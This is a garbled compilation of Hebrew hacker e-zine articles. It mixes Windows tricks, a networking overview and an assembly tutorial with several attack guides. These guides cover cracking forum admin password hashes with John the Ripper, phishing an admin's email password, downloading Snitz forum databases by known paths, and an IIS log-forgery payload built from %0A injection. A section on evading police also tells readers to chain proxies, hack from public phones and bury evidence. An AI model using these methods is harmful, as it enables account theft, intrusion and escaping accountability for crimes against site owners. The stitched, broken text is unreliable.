Microsoft\Windows\CurrentVersion\Network\LanMan
בחרו כונן והביטו בחלק של ה
parm1enc
יהיה כתוב שם משהו כזה
""74d80e
ABC
כי אין חשיבות ל
][x
שבא אחרי המספר הוא רק עוזר לפענח
טבלה הקסגונית:
8 7 6 5 4 3 2 1
באגים בוינדואז
בטקסט הזה אני אסביר למה מיקרוסופט הם טמלים .במיוחד בווינדואז.
אני לא העשה את המדריכים ארוכים אז אם חסרים פרטי מידע חשובים תודיעו לי
ב...
mailto:hack_planet_site@hotmail.co.il
משום מה הבאג הזה עובד רק על קבצי התקנה ...טוב אז יש לכם קובץ התקנה
שאתם רוצים לשנות מ
exe
ל
pif
בגים בווינדואז
יאללה בואו נעשה את זה קצר
נכון כשעולה המחשב
יש תמונת פתיח של ווינדואז????!!!! וגם תמונה כשמכבים את המחשב אז כאן
כתוב איך לשנות את התמונות
dir c:\windows
חכו
כתבו
ren logow.gif logow.sys
ren logos.gif logos.sys
exit
והנה יש לכם את התמונות שרציתם ביי
מקווה שתרמתי
כיבוי
_________
הפעלה מחדש
________________
)במקום התחל < כיבוי < בחירת הפעל מחדש < אישור < (
buffer size=25
emulation=vt-100\ANSI
תלחצו אוקיי
עכשיו כתבו
לחצו
enter
לחצו
enter
data
לחצו
enter
והנה
החברה שלך מקבלת מכתב מחבר שלך ואם תעשה בדיוק ההפך חבר שלך גם יקבל
מכתב מחברה שלך והם יתחתנו ויעשו ילדים ותוכל למקור את הילדים בשוק
הפשפשים
מקווה שזה תרם לכם
cool-abdool
username:71basdy12b78a
במקום של ה
username
נמצא השם משתמש של אותו מנהל פורום ובחלק שבא אחרי הנקודותיים זו הסיסמה
אבל ...הסיסמה מוצפת זה לא קל כמו שחשבתם הא ...טוב אתם צריכים להוריד
אחת משתי התוכנות הבאות
cracker jack
john the ripper
nbtstat -10.128.28.16
ואז יכתב לכם משהו כזה
Netbios Name
^
<SHARE a <00
===> <SHARE ab <20זה מה שמעניין אותנו
<FILE <1b
יש לי עוד שיטה הרבה יותר איכותית אבל ידיד שלי אינו מרשה לי לפרסם אותה
מסיבות אישיות
אז אני אבקש ממנו רשות פעם נוספת ואם הוא יסכים אז אני אפרסם
שלכם
cool-abdool
:החדרים
:חוקים
:נ.ב
עוד לא מצאתי שייטה איך לדבר בכללי בלי לקבל זי ליין אז מי שמצא דרך אנא
לפנות אליי באיי סי קיו105260623 :
^^ ^^SuB_ZerOכתבה זאת נכתבה על ידי
- www.hackerz-zone.co.ilכל הזכויות שמורות ל
בקרוב* איך להכנס לצ'אט של נענע*
Hack server account
זה לא ישירות ולא בעקיפין .כל החומר כאן היא למטרה לימודית בלבד
ואסור בשום פנים ואופן להשתמש בו
.
היי!!!!!!!!!!!!!!
מה המצב!?
הכל בסדר!
יופי..............
זו הכתבה הראשונה שלי ...אני לא יודע עם אמשיך אתן אבל בכל זאת צרו איתי
קשר והביעו את
ביקורתיכם..............
טוב! בכל מקרה מה שרציתי לדבר איתכם זה שלהרבה ממכם יש הרבה ידע...
טוב ...אז אלה עם הידע
טוב ,אז מה שקורה זה שצריך להישתמש בתחכום ...מה אני מגדיר תחכום!?
תחכום זה מישהו שצריך להפיק מהידע שיש לו כמה שיותר .בין עם זה קצת ידע
או הרבה...
~~~~~~~~~~~~~~~~~~~~~~~~~~
---------------------------------------------------------------------
-----------------------------
מצרכים:
* ידע בסיסי במחשב ]הפעלת האינטרנט ,לדעת ליכתוב במקלדת ,בלה בלה
בלה[.......
יודע מי זה[....
* מח ]רצוי עובד![
^^^^^^^^^^^^^^^^^^^^^^^^
מה זה איחסון!?
כאשר אני אומר איכסון אני מתכוון שהם מאכסנים את קבצי אתרים של אחרים;
]אתרים מורכבים מקבצים[
~~~~~
freehost25
websamba
ו YWForum
בגוגל ]תמיד תשימו גרשיים כדי לקבל את מספר התוצאות המצומצם ביותר[
---------------------------------------------------------------------
-------------------------------
------
טוב אז הרעייון שלנו זה להשיג את השם משתמש והסיסמא של חשבון השרת של
האתר.
אבל מה עם הסיסמא!?
אז בואו נשתמש בשיטה מתוחכמת ....שוב אינני הולך ללמד אתכם משהו חדש,
אלה רק
---------------------------------------------------------------------
-------------------------------
--
מכירים את האפשרות הזאת בכל מני אתרים שמבקשים שם משתמש וסיסמא Forgot
?Password
או בעברית "שחזר סיסמא"? "אתם בטח שואלים מה לעזאזל זה עוזר לנו!!??"
בדרך כלל באתרים כאלה שאתה לוחץ על האפשרות וזה
שולח לך את הסיסמא לאימייל ששמת בפרופיל האישי ...אתם בטח לא מבינים מה
זה קשור בכלל..
אז בואו נלך לאתר במקרה לשרת שדיברנו עליו קודם[www.websamba.com] ..
שאלה :איך אנחנו אמורים להשיג את אימייל המשתמש כדי שנשלח את הסיסמא
לדואר שלו!?
בדרך כלל באתרים כתוב דברים כמו "צור קשר" למשל באתר http://www.red-
board.co.il
כתוב שם "צור קשר" לוחצים וזה מביא אותנו לעמוד שכתוב בו -Admin
אימייל.........
אבל זה סתם דוגמא ...ככה זה בדרך כלל באתרים וכמובן שאפשר גם להשיג את
אימייל המשתמש
בצורות אחרות ,כמו עם אתה מכיר אותו אז אתה יכול לשאול אותו מה
האימייל...
יכול להיות שהוא פרסם איפה שהוא ...יכול להיות שרשום בפרופיל באיי סי
קיו ....והלאה...
לדוא"ל שלו ,אבל מה זה טוב ,גילנו את אימייל האדמין שלחנו את הסיסמא
עוזר לנו!?!?
פריצת האימייל
~~~~~~~~~~~~~
אז אתם לא צריכים לקרוא את הכתבה ...רק עם במקרה אז אולי יעזור לכם...
טוב ,עם אתם יודעים פרטים על המשתמש אתם יכולים לשחזר את סיסמת האימייל
שלו
לפי תאריך הלידה של המשתמש ולאחר מכן שואלים איתכם שאלה סודית שהמשתמש
קבע
זה הסיבה שרצוי ידע בזיוף אימייל ...מה שאנחנו הולכים לעשות
שיטה א
^^^^^^
*/כל הזמן תנסו שמות נוספים כי רוב הסכויים שהשמות הרשמיים תפוסים\*...
עם עוד לא הבנתם את הרעיון ,אז אנחנו רצים שהקורבן יקבל משהו כזה:
Hello blabla
]הכתובת[
.......Because.............BLAbla
אז יש לנו
שיטה חילופית
^^^^^^^^^^^^
אז במכתב הזה יהיה כתובת "שזה כתובת סודית שעם הוא שולח את הסיסמא
לכתובת הזו אז הוא יקבל שידרוג בדואר" ]סתם משהו שעלה במוחי[...
עוד משהו שעלה במוחי[... "והסיבה שהוא נבחר זה בגלל שהיה הגרלה" ]סתם
---------------------------------------------------------------------
-------------------------
לאתר המסכן!
שלכם,
B{u}G
פריצה לסניטז
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~~~~~~~~~~~~~~~~~
~~~~~~~~~~~~~~~~~~~~~~~~
www.red-board.co.il (1
www.warez-forum.up.co.il (2
www.israel-forum.co.il (3
טוב ,אתם בטח ראיתם פורום של סניץ,
פורום של סניץ.
.Snitz_forums_2000
,www.hacked.com/db/snitz_forums_2000.mdbאו
www.hacked.com/forum/db/snitz_forums_2000.mdbאו
www.hacked.com/forum/snitz_forums_2000.mdb
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
שלכם,
B{u}G
נושא :אבטחה
כן יוצגו המדריכים והטקסטים בנושא אבטחה:
אנונימיות במירק
אנונימיות ב IRC
~~~~~~~~~~~~~~~~~~~~~~~~~
והולכים ל
File
Option
Firewall
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~~~~~~~~~~~~~
שלכם,
תוכנית "שטן"
תוכנית :Satanנכתב ע"י .Crossbow
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
היום זה היום שישנה את החיים שלכם .היום אתם תחשפו לראשונה לאחת הדרכים
שבה ההאקרים האמיתיים משתמשים .היום תלמדו על .Satanדבר ראשוןSatan ,
זה
לא איזה תוכנה מהגהנום ,אלא תוכנית שמטרתה לזהות חורים באבטחה Satan .זה
,Security Administrators Tool for Analyzing Networksאו בעברית ,כלי
למנהלי אבטחה לניתוח רשתות .תוכנה זו משמשת לסריקת מחשבים ברשת כדי
לגלות
נקודות תורפה מסויימות .התוכנה הזאת מבצעת את אותם הדברים שאותם מבצעים
האקרים כדי לפצח מערכות ,אלא שבמקום לנצל את נקודת התורפה של המערכת,
היא
רק מדווחת על החור אבטחה Satan .מדווחת על פגמים בשרתים עבור
הפרוטוקולים
Ftp, Finger, Nis, Nfs, Rexdועוד .בדרך כלל הפגם הוא בסך הכל קובץ
תצורה
שנבנה בצורה גרועה ,אבל לפעמים הפגם הוא חור אבטחה או באג .ביחד עם
Satan
באים גם דפי הדרכה שמסבירים בדיוק על סוגי נקודות התורפה שניתן לנצל,
וגם
איך ניתן לתקן אותן .פה זאת הבחירה שלכם .אני בטוח שכשהתחלתם עם האקינג,
רובכם חשבתם לעצמכם "אז נראה כמה טריקים לחברים שלי ונלך" .אז זהו ,שלא.
זה כבר לא משחק .זה האקינג אמיתי ומסוכן ,שיכולים לתפוס אתכם .אז תיקחו
חמש דקות ,ותחשבו טוב טוב על איזה האקרים אתם רוצים להיות .אתם יכולים
להיות האקרים מניאקים )שחורים( שפורצים למערכת ודופקים לה ת'צורה .אתם
גם
יכולים להיות האקרים טובים )לבנים( שמגלים באג במערכת ,ומתקנים אותו או
מודיעים עליו לאדמין .אני ממליץ על האפשרות השנייה ,כי זה נותן שם טוב
להאקינג ,זה מראה שאנחנו לא מתלהבים מעצמנו יותר מדי .אחרי שהחלטתם מה
תעשו בתור האקרים ,אתם יכולים להמשיך.
אזהרות לתוכנה
=============
Satanנבנתה בשפות Perl 5.0ושפת .Cאל תיקחו מאף אחד את התוכנה
היישומית
כי כל אחד יכול להשתיל בה וירוס .תורידו את הקוד מקור ותקמפלו בעצמכם.
התוכנית היא תחת רשיון ,Gnuיעני ,אתם יכולים לעשות בקוד מקור הכל ,כל
עוד אתם לא משתמשים בו למיסחור )יעני ,לעשות כסף( .יש כמה מערכות ברחבי
הרשת שכוללות אזהרות נגד פולשים והפעלה של Satanברשת עלולה להפעיל את
האזעקות האלו ,אז תיזהרו.
להוריד את זה
============
טוב ,הכי טוב זה להוריד מאפטיפי אנונימי ,שכתובתו היא:
ftp.win.tue.nl/pub/security
טוב ,תיזהרו עם זה ,ועוד עצה אחרונה :תסתכלו בקוד המקור של התוכנה ,הוא
אומר המון!!! שלכם,
קרוסבוו
קבצים חבויים
חלק -א' הקבצים החבויים של מיקרוסופט!
----------------------------
הקדמה קצרה
-----------
היי חבר'ה ברוכים הבאים למדריך הראשון בסדרה שלי על הקבצים החבויים של
מיקרוסופט.
נתחיל בזה שאני לא מדבר על הקבצים החבויים הרגילים של מיקרוסופט
אלה שבמאפיינים שלהם רשום שהם חבויים ) (Hiddenאני לא מדבר על ה +h
הרגילים!
אני מדבר על הקבצים הבלתי נראים לגמרי שלא קיימים בשום מקום ואי אפשר
לראות אותם!
)גם אם תעשו באופציות של התיקייה שיראה את כל הקבצים כולל החבויים לא
תראו אותם.(...
אז למי איכפת ולמה זה בכלל מעניין אותנו? הא ..הא? ..
-----------------------------------------------------
אוקיי שאלה טובה )ארוכה אבל טובה !(:
אתם לא תאמינו בכלל למה שאני עומד לספר לכם אז תשבו ותחזיקו חזק!
כולם יודעים שאין פרטיות בוונידוס ושמיקרוסופט מסריחים!
אבל מה שלא ידעתם זה באיזה סדר גודל זה!!!
וזה תפקידי לספר לכם וזה תפקידינו בכלל בהאקרז-זון לספר לכם
את כל הדברים שלא ידעתם ואת כל הדברים שלא רצו שתדעו!
אוקיי עכשיו אחרי כל המשפטים שנגמרים בסימני קריאה אפשר להגיע לאקשן)!(
מה שמכילים הקבצים האלה או התיקיות האלה )כן יש גם תיקייה שלמה
מוסתרת (...זה:
כל אתרי האינטרנט שגלשתם בהם אי פעם!!!
ועוד כל מיני פרטים עליכם...
עכשיו ...אם מישהו יבנה טרוג'ן
)אני לא יודע בדיוק מה המילה לזה בעברית ...טרוייני? מטריין? טרויין?(
שיקרא וינתח את כל הקבצים החבויים הוא יוכל לבנות עליכם פרופיל שלם!
כולל מספר האתרים שבקרתם בהם כולל כתובתם כולל שמות משתמש בחלק מהאתרים
כולל מה חיפשתם במנועי חיפשו ועוד המון דברים!
\* הערה :אולי צוות האקרז -זון יפתח כזה טרוג'ן */
בכל אופן אותי זה עצבן נורא...
ואני בטוח שזה מעצבן גם את רוב הקוראים של המדריך הזה!
אני לא מבין למה! אין סיבה בכלל שמיקרוסופט יעשו דבר כזה!
אין שום סיבה שבעולם! זה לא לטובתנו זה בטוח...
וזה גם לא נראה לי עוזר להם באיזה שהיא דרך!
---------------------------------------------------------------------
-
אני מת מעייפות ואני חולה אז אני יפסיק פה ובמדריך הבא אני ילמד אותכם
עוד דברים שלא
ידעתם על הווינדוס שלכם! כולל איך למחוק את הקבצים האלה!
---------------------------------------------------------------------
-
שוב שלום! במדריך הקודם הפסקנו במצב שבו ראיתם את מה שהווינדוס אסף
עליכם...
בחלק הזה של המדריך אני יראה לכם עוד כמה דברים
ואיך לנקות את הדברים שכתובים עליכם ופוגעים בפרטיותכם.
אוקיי אז לעבודה!
מה עוד?
-------
ווינדוס גם שומר ברג'יסטרי את האתרים האחרונים שבקרתם בהם!
האתרים האחרונים שבקרתם בהם נמצאים ב:
HKEY_USERS/Default/Software/Microsoft/Internet Explorer/TypedURLs
HKEY_CURRENT_USER/Software/Microsoft/Internet Explorer/TypedURLs
המלצה לסיום:
------------
תעיפו את ווינדוס לכל הרוחות וגם את כל המוצרים של מיקרוסופט!
אני יודע שזה מה שאני הולך לעשות!
אני מתקין לינוקס ובחיים לא חוזר לווינדוס ולאקספלורר!!!
בכל אופן מה שתבחרו אני מקווה שתשמרו לעצמכם על הפרטיות תמיד!
מקווה שעזרתי...
!!!MICROSOFT SUCKS
רשתות
מה במדריך?
-----------------------------------------------------------------
יתרונות:
חסרונות:
א .חדירת וירוס -ברגע שוירוס פגע במחשב אחד ,כל שאר המחשבים
נפגעים ,ברוב המקרים ,באותו וירוס.
אז ,זהו! כאן נגמר המדריך לרשתות חלק א' ,אני לא ממש בטוח מה
יהיה במדריך הבא ,אני בעצמי עוד לומד על הנושא ,לפי דעתי בפרק
הבא אני כבר יסביר לכם על בניית רשת והגדרת רשת ,אם לא אז תחכו
לחלק השלישי ;(.
זיוף לוגים
iisזיוף לוגים ב
____________
מערכות פגיעות
++++++++++++++
כל שרתי ה
iis
עד לגירסה הלפני אחרונה של השרת
)(iis 5.1
זאת אומרת כל הגירסות עד
iis 5.1
תקציר
++++++++++++
בעיית אבטחה שמאפשרת לתוקפי השרת לזייף את הלוגים
שמגיעים לשרת הבעייה נוצרת עקב תחליפי הקס
)(xx, where xx is an HEX code%
בצורתם המקורית בקבצי הלוג
לדוגמא:
""%0A
מתחלף בשורה חדשה ההתקפה אפקטיבית על שרתי איי איי אס בהדרגות המקוריות!
פרטים
+++++++++
בפרטי הלוג שבקבצי הלוג יש קוד הקס שמתורגם לאותיות לדוגמה
index%2e.asp/
מתורגם ל
index.asp/
כאשר ההקס מתווסף לקובץ הלוג .הבעיה מעלה את העובדה ש
%0a
מתורגם לשורה חדשה ו
ff%
נראה כמו רווח
בעזרת שני אלה תוכל בקלות ליצור קובץ לוג שנראה אמיתי!!!
דוגמה
+++++++
index.asp%FF200%FFHTTP/1.1%0A00:52:11%FF198.116.142.34%FFGET/
%FF/evilplaces
הנה קריאה ל
index.asp
שמסתיימת ב
notice 200
ו
HTTP/1.1
מראה את הגירסה של ה
http
אז מגיעה שורה חדשה
%0a
עקב העובדה שכל הלוגים נעשים ע"פ זמן גריניצ כל מה שהתוקף צריך לעשות זה
לגלות מה השעה בלונדון והם מסיימים! בעקבות זה מגיע האיי פי שאתה רוצה
'למסגר' ואז כל
שאר הפרטים שאתם חושבים שתצטרכו.
ff%ו
%0a
יעבדו ב
edit
של דוס)הנווטפאד של פעם( מכיוון שסביר שמנהל האתר ישתמש ב
notepad
יש לשנות את ה
ff%
ל
%09
אנונימיות
מה הטקסט בא להגיד??
-----------------------
הטקסט אנונימיות בא להגיד לכם שאתם צריכים להיזהר ולהיות פולנים!!!!!!
לדאוג לכל דבר קטן לא ידעתי שזה דבר כל כך חשוב עד שזה קרה לחבר שלי
גם בסרט " "hackersקורה משהו דומה שתופסים מישהו! ..
איך לא להיתפס?
--------------
טוב זה תלוי בפעולה שאתם עושים פורצים לבנק ? וכאלה דברים
אבל תזכרו לא סתם פורצים לאנשהו ומסתכלים בתיקיות זה לא צחוק
אל תעשו את זה סתם ..טוב בואו נמשיך
לפני כן אתם חייבים קודם כל להשיג מאנשים סיסמאות של אחרים
יש מלא משוגעים בדאל נט באי אר סי שיתנו לכם כרטיסי אשראי
סיסמאות של אנשים שם משתמש ועוד..
אחרי שהתחברתם על חשבון של מישהו אחר זה דבר אחד
לדבר השני קוראים פרוקסי ..
מה זה בעצם ? פרוקסי עובד על פרוטוקול ...הפרוקסי נוצר
בשביל להאיץ לכם את האינטרנט )בקושי הוא מאיץ (..ולקצר את כל המסלול
שלכם..
ה routeאבל זה לא חשוב כרגע ...אולי אני יעשה מתישהו טקסט על פרוקסי
טוב בואו נמשיך ...איך משתמשים ומתקינים את הפרוקסי ?
הנה רשימה של סרברים של פרוקסי :
cache1.dsldesigns.com:1080
nt.onninen.ee:8080
i.am.the.god.of.ircnet.pl:8080
proxy-wi.dataway.ch:8080
bess3.proxy.lacoe.edu:8080
proxy.iprolink.ch:8080
prox2.mediaserv.net:8080
magica.ntb.no:8080
DSL-2-149.isd.net:1080
ליד כל פרוקסי רשום את הפורט שלו..
עכשיו איך מתקינים את הפרוקסי? טוב נגיד בחרתם ב :
magica.ntb.no:8080
אז נכנסים לאקספלורר שלכם לוחצים על תפריט ה tools
בוחרים ב internet options
בוחרים בפרופיל ה conections
לוחצים על lan settings
מסמנים ב vאת use a proxy server
וממלאים את השאלות
אחרי שבחרתם לכם פרוקסי ותפרצו לאנשהו אז בזק יקבלו את האי פי של
הפרוקסי )אי פי = הת"ז של המחשב שלכם(
ואז בזק יבקשו את הלוגים של הסרבר יכול להיות שהסרבר במקום אחר ולא בארץ
אז הם יצטרכו לטוס לשם (:
ועד שהם יקבלו את הלוגים זה כבר ימחק...
אז יש דרך להתחבר דרך פרוקסי שמתחבר דרך פרוקסי שמתחבר דרך פרוקסי ואז
אם אתם פורצים לבזק..
בזק יעשו מסע מסביב לעולם ב 80יום (:אז תתחברו דרך המון פרוקסי ואיך
עושים את זה רושמים ככה :
DSL-2-149.isd.net:1080-_-magica.ntb.no:8080-_-
prox2.mediaserv.net:8080
כרגע התחברתי דרך שלושה פרוקסים אפשר יותר(: ..
טוב זו דרך אחת שלא יגלו אותכם ..
)צריך לעשות את כל הדרכים( אפשר בהמון תוכנות להתחבר דרך פרוקסי גם באי
סי קיו...
תתחברו דרך כל מקום שאתם יכולים אחר כך בקשר לתוכנות האקינג לדיסקים
צרובים\פרוצים
לכל טקסט או משהו שקשור להאקינג או פריקינג או לא חוקי שימו בדיסקים לא
במחשב
כי אם תופסים אותכם אתם יכולים לרוץ לחצר שלכם או משהו ולחפור בור ולשים
את הדיסקים או משהו ..
אחר כך אם אתם נכנסים לפורומים או רושמים לעצמכם אתר באיזשהו שרת או כל
דבר אחר שמבקש מידע
באינרנט אל תתנו את המידע שלכם ..תמיד תהיו אנונימים אבל למרות זאת
שאתם פורצים לאנשהו אז תקראו את הטקסט
של הפריקינג מהגיליון הראשון ותתחברו דרך טלפון ציבורי או דרך בית של
מישהו אף פעם אל תפרצו לאנשהו דרך הבית שלכם
אחרת יתפסו אותכם על בטוח ואל תדברו עם חברים שלכם לא בפלאפון לא בטלפון
על האקינג פריקינג כאלה דברים
אל תדבר עם אף אחד גם לא באינטרנט אולי באי סי קיו וכאלה מקומות אבל רק
אם אתם סומכים על הבנאדם ב 100%
אחר כך יש את התוכנות חפשו בכל האינרנט תוכנות שמבלבלות אנשים ושלא
ייתנו לחברות גדולות לאתר אותכם
יש מלא תוכנות שגם מזייפות אי פי וכאלה תמצאו כמה שיותר ....
ואם אתם פורצים דרך מישהו אחר אז תפרצו דרך מקום שהוא לא קרוב לבית..
אוקיי הנה אני קול אבדול האקר שוויצר שבטוח שהוא הכי טוב בעולם משוכנע
שבחיים לא יתפסו אותו!
אבל אז קרא לי משהו ששינה לי את כל הגישה להאקינג
מאז שהייתי מתלמד לקחתי האקינג באיזי אמרתי מה כבר יכול לקרות???
עכשיו אחרי שפעם ראשונה תפסו אותי פתאום הבנתי שמה שאני עושה זה
ח ו ק י ! ! ! ! ל א
תמיד ידעתי שאני עובר על החוק המושג הזה אף פעם לא באמת השתרש בי!!!!
תמיד אמרתי יאללה מה כבר הם יעשו!
אבל עכשיו אני יודע האקינג זה לא משחק ...תעצרו שניה ותחשבו איך באמת
אתם מיתייחסים להאקינג כי אתם מיד תראו שאתם לא לוקחים את זה כל כך
ברצינות לפחות רובכם!
אז תקשיבו לסיפור שלי:
אני כותב לי טקסט אל
adsl
בבזק ובו זמנית מנסה דברים חדשים על הסרבר שלהם!
אחרי כל מיני דברים שעשיתי פתאום אני קולט הסרבר נתקע ואני מנותק!!!
אני אפילו לא התכוונתי לעשות שום דבר רק ללמוד איך הכל שם פועל
ובטעות....
פתאום אני מקבל טלפון משרות
adsl
בבזק!
מיד ניתקתי את הטלפון והתקשרתי לחבר שלי שגם לו יש
adsl
שאלתי אותו אם הוא מחובר הוא אמר שהוא התנתק ושהוא לא מצליח להתחבר!!!
חטפתי התקף לב וישר התקשרתי לעוד חבר שלי וגם הוא אמר לי שהוא לא מצליח
להתחבר
ברגע הזה עלו לי דמעות לעיניים...כמעט בכיתי
כי הבנתי שאני הפלתי את הסרבר של ה
ADSL
באותו רגע מישהו מצלצל לי בדלת אחרי היסוסים רבים עם
kixl0r
באיי סי קיו ומחיקת רוב ההארד דיסק שלי בגלל שהוא מכיל מלא חומר על
האקינג
הלכתי לדלת וראיתי שזה השכן שבא להחזיר לנו גופיה שנפלה לנו מהחבל כביסה
אבל...
אבל אני לא נרגעתי כי ידעתי שהם עוד יגיעו!
לידיעתכם העונש על כזה דבר יכול להסתכם בקנס עצום
של מילוני דולרים ...אסירה על שימוש במחשב עם אינטרנט ו 10שנים בכלא!!!
אז ...אני עוד מחכה לסוף המר שיגיע בקרוב!!! ואם עדיין תהיה לי גישה
לאתר אני יסבר לכם מה קרה!
רק תמיד תשתמשו בפרוקסי לא משנה איפה לא משנה למה אפילו אם אתם שולחים
דואר בטלנט או עושים ברוט פורס לאתר הם יום אחד יתפסו אותכם!!!
אז תזהרו!!!!
כבר שנים שאוכלוסיית האיי סי קיו הולגת ומתעצמת ואנשים כבר לא יכולים
לזכור את המספר שלהם כי כבר יש בו 12ספרות אז הם מוצאים מישהו
עלוב שיש לו מספר קצר פורצים לו לאיי סי קיו והוא יכול לבכות .וכולנו
יודעים שאנחנו לא רוצים להגיע למצב כזה אז...
סיסמאות:
+++++++++++++
בסיסי
_______
דבר ראשון:
שהסיסמה שלכם לא תהיה שם העיר שלכם אין לכם מושג כמה אנשים עושים את זה
דבר שני:
שהסיסמה לא תהיה משהו שאתם אוהבים
דבר שלישי:
השתמשו תמיד גם באותיות וגם בספרות
דבר רביעי:
השתמשו גם באותיות קטנות וגם באותיות גדולות
מתקדם
________
דבר ראשון:
דבר ראשון השתמשו באותיות אסקי מוסתרות אני ממליץ לדוגמא על
Alt+255
שזה כאילו לא עושה כלום אבל בעצם הוא עושה אות בלתי נראית
דבר שני:
השתמשו יותר משורה אחת בסיסמא)אני יודע מה אתם חושבים אבל כן זה אפשרי(
פשוט תורידו את
KaosICQCrack 1.2
מהאתר
http://www.nzkaos.net
איי פי
+++++++++++++
קראקים
++++++++++++++++++++
אחד :לראות מספר איי פי של משתמש גם אם הוא עשת את ההסתרה כמו שכתוב
קודם
שתיים :להוסיף משתמש לאיי סי קיו בלי
authorization
שלוש:השתמשות ביותר מאיי סי קיו אחד באותו זמן
ארבע :הוספת עצמך לרשימה שלך זה יכול להיות מאוד שימושי
-spoofingלרמות
++++++++++++++++++++++++++++++
מה שספופר עושה זה לרמות לשנות במספר האיי פי שלך הוא יוצר איי פי חדש
אפילו ספופרים טובים יכולים לזייף מספר איי סי קיו
אתם יכולים להוריד ספופר ב
www.warforge.com
הוא נקרא
lame toy
אני חושב שאחד הדברים הכי טובים לעשות עם ספופר הוא לשלוח לאנשים הודעות
מעצמם ולהגיד שזה המחשב שלהם
מה שגם נגרם אחרי זה הוא ש כשבן אדם מוסיף את עצמו לרשימה שלו קורה משהו
שנקרא
db corruption
זאת אומרת שכל הרשימה שלו נמחקת!
xxx.xxx.xxx.xxx
^ ^ ^ ^
| | | |
_____ _____
~ ~ ~ ~
^ ^
| |
network | host
האמת שזה לא יכול לעזור לכם בשום אופן שאני יכול להעלות על דעתי אבל
תהנו עם זה
)לא שאת זה אפשר לעשות(
בהצלחה
נושא :תכנות
כאן יוצגו טקסטים ומדריכים ללימוד שפות תכנות ,טיפים ועוד
===============================
-----------------------------------------------------
יחידות אחסנה
-=-=-=-=-=-=-
הנתונים והפקודות מוחזקים במחשב ביחידות אחסנה שונות:
בסיסי ספירה
-=-=-=-=-=-
A,B,C,D,E,F,0,1,2,3,4,5,6,7,8,9
השימוש בבסיס הקסדצימלי נוח ,מכיון שהוא מתאר בצורה ברורה יותר נתונים
ייצוג מספרים
------------
כאשר תכתבו ערך מספרי בשפת אסמבלי ,תסמנו לידו את הבסיס שבו הוא מיוצג.
עושים זאת ע"י כתיבה של אחת מהאותיות הבאות מימין למספר ,אפשר לכתוב אות
קטנה או גדולה:
- Dאו בלי ציון בכלל -מספר דצימלי ,לדוגמא 29 :ואחר כך מוספים Dמצד
ימין ,או 29בלבד.
הזיכרון
-=-=-=-
הזיכרון הוא ההתקן של מערכת המחשב שבו נשמרים פקודות התוכנית שמתבצעת
במחשב
והנתונים השוטפים המשמשים אותה כקלט ,או מופקים ומיועדים לאחד מאמצעי
הפלט.
הזיכרון בנוי מ -תאים ,כל תא יכול להכיל בית אחד בלבד) 8סיביות(.
לכל אחד מהתאים יש כתובת :התא הראשון הוא בכתובת ,0ולאחריו הכתובת היא
1וכך הלאה.
תיאור הזיכרון
-------------
| 0| 6
|24| 5
|43| 4
| 0| 3
| 0| 2
| 0| 1
| 0| 0
כדי שנוכל לעבד את הנתונים ,צריך להיות מנגנון לקריאה וכתיבה שלהם בתאי
הזיכרון.
קריאת הנתון או קליטת נתון אינה הורסת ואינה משנה את ערכו בתא.
בכל קריאת נתון מהזיכרון ,יש להגדיר את הכתובת שממנה יש לקרוא אותו.
אפשר לכתוב נתון חדש לתא ,אבל במקרה הזה -הערך החדש ימחוק ויחליף את
הערך הישן שהיה בתא.
בשביל לכתוב נתון חדש לתא ,צריכים לציין את הכתובת שאליה כותבים את
הנתון החדש ואת הנתון לכתיבה.
למשל:
| 0| 6
|54| 5
|43| 4
| 0| 3
| 0| 2
| 0| 1
| 0| 0
הצורך לבצע גיבוי היא פעולה של כתיבת הנתונים מהזיכרון על מדיה מגנטית,
דיסק או דיסקט,
אוגרים
-=-=-=-
למי שלא קלט ,זו לא הכוונה למכרסמים הקטנים אלא לאוגרים שבמעבד.
כמו בזיכרון -כך גם האוגר מכיל נתון ,אשר אפשר לקרוא אותו או להחליף
אותו באחר.
כמו בזיכרון ,כיבוי המחשב גורם לאובדן הנתונים שהיו באוגר.
----------------------------------------
High Low
----------------------------------
----------------------------------
----------------------------------
----------------------------------
----------------------------------
לכל מחצית אוגר יש סימון של אות זיהוי של האוגר ולידה האות Hאו .L
אוגר :2
אוגר ) BXאוגר הבסיס( -החלק השמאלי נקרא BHוהחלק הימני נקרא .BL
אוגר :3
אוגר ) CXאוגר המונה( -החלק השמאלי נקרא CHוהחלק הימני נקרא .CL
אוגר :4
אוגר ) DXאוגר הנתונים( -החלק השמאלי נקרא DHוהחלק הימני נקרא .DL
ע"י חלוקה זו קיבלנו 12אוגרים שונים :ניתן לפנות לאוגר AXהשלם ,או לכל
אחד משני חצאיו.
-------------------------------
אוגר :6
אוגר :7
אוגר :8
----------------------------------
אוגר :9
אוגר :10
אוגר :11
אוגר :12
אוגר :13
----------------------------
אוגר :14
אוגר ) Fאוגר הדגלים( -מכיל 9דגלים )סיביות( הנמצאים במצב אחד או אפס
לוגי.
===============================
-------------------------------------------
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
------------------------
------------------------
------------------------
את הפקודות תמיד קוראים משמאל לימין ,נרשמת פקודה ולאחר מכן אופרנד אשר
יכול להיות
אוגר ,כתובת זיכרון ועוד ,לאחר מכן יש פסיק ) (,המשמש להפרדה בין
האופרנדים ואחריו
פקודות אחרות אינן כוללות אופרנדים כלל ,מכיון שהאופרנדים עבור פקודות
אלו הם
כדי לעשות זאת ,יש לרשום את סימן הנקודה-פסיק );( ולאחריה הערה.
הפקודה MOV
-========-
הפקודה MOVגורמת להעתקה ולא להעברה של נתון ממקום אחד למקום אחר
בתוכנית.
---------------------
תבנית הפקודה:
צמוד לפקודה MOVנרשם שם של אחד האוגרים ומימינו ,לאחר הפסיק ,נרשם הערך
שאותו רוצים להציב.
דוגמא:
הצבת הערך ) 3545בבסיס הקסדצימלי( בתוך אוגר :BX
MOV DX,3545H
תמונת האוגר:
_______________
|______|______|
DH DL
הספרות בעלות הערכים הגבוהים יותר ,נשמרות תמיד בחצי האוגר השמאלי הגבוה
.H
--------------------------